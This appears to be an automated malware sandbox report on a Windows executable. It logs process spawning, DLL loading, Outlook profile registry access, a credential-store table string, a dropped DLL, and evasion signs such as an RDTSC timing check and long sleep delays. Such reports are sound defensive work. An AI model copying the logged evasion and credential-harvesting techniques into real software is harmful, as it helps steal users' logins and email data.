            Source: ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D34000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D05000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D27000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036CF5000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2735097720.0000000037C3D000.00000004.00000800.00020000.00000000.sdmp, ajRZflJ2ch.exe, 00000005.00000002.2734129419.0000000036D13000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: ajRZflJ2ch.exeVirustotal: Detection: 74%
            Source: ajRZflJ2ch.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeFile read: C:\Users\user\Desktop\ajRZflJ2ch.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\ajRZflJ2ch.exe "C:\Users\user\Desktop\ajRZflJ2ch.exe"
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess created: C:\Users\user\Desktop\ajRZflJ2ch.exe "C:\Users\user\Desktop\ajRZflJ2ch.exe"
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess created: C:\Users\user\Desktop\ajRZflJ2ch.exe "C:\Users\user\Desktop\ajRZflJ2ch.exe"Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: ajRZflJ2ch.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2233521222.00000000059F7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeCode function: 0_2_70131B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_70131B5F
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeFile created: C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeAPI/Special instruction interceptor: Address: 61BFAB7
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeAPI/Special instruction interceptor: Address: 475FAB7
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeRDTSC instruction interceptor: First address: 617EA08 second address: 617EA08 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FEE2CF3B896h 0x00000006 cmp ch, bh 0x00000008 inc ebp 0x00000009 test cl, cl 0x0000000b inc ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeRDTSC instruction interceptor: First address: 471EA08 second address: 471EA08 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FEE2CF3EC96h 0x00000006 cmp ch, bh 0x00000008 inc ebp 0x00000009 test cl, cl 0x0000000b inc ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeMemory allocated: D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeMemory allocated: 36C10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeMemory allocated: 38C10000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599891Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599219Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 599094Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598984Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598875Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598766Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598656Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598547Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598438Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598313Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597969Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597859Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597750Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597641Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597531Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597422Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597188Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596969Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596844Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596734Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596620Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596516Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596406Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596297Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596187Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594969Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594749Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594640Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeWindow / User API: threadDelayed 1099Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeWindow / User API: threadDelayed 8748Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsd88AD.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exeAPI coverage: 3.4 %
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep count: 38 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -35048813740048126s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -599891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 332Thread sleep count: 1099 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 332Thread sleep count: 8748 > 30Jump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -599563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -599438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -599219s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -599094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -598984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -598875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -598766s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -598656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -598547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -598438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -598313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -598094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -597969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -597859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -597750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -597641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -597531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -597422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -597313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -597188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -596969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -596844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -596734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -596620s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -596516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -596406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -596297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -596187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -595969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -595844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -595516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -595187s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -595078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -594969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -594859s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -594749s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -594640s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\ajRZflJ2ch.exe TID: 4632Thread sleep time: -594531s >= -30000sJump to behavior
